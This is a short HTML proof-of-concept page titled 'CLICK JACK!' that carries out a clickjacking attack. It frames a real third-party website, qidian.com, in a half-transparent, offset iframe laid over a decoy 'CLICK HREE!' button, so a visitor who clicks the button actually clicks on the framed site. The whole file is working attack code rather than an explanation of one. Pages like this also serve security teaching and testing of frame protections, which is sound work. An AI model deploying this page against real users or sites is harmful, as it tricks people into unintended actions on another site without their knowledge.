<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CLICK JACK!</title>
    <style>
        iframe{
            width: 900px;
            height: 250px;
            position: absolute;
            top: -195px;
            left: -740px;
            z-index: 2;

            -moz-opacity: 0.5;
            opacity: 0.5;
            filter: alpha(opacity=0.5);
        }
        button {
            position: absolute;
            top: 10px;
            left: 10px;
            z-index: 1;
            width: 120px;
        }
    </style>
</head>
<body>
    <iframe src="https://www.qidian.com" scrolling="no"></iframe>
    <button>CLICK HREE!</button>
</body>
</html>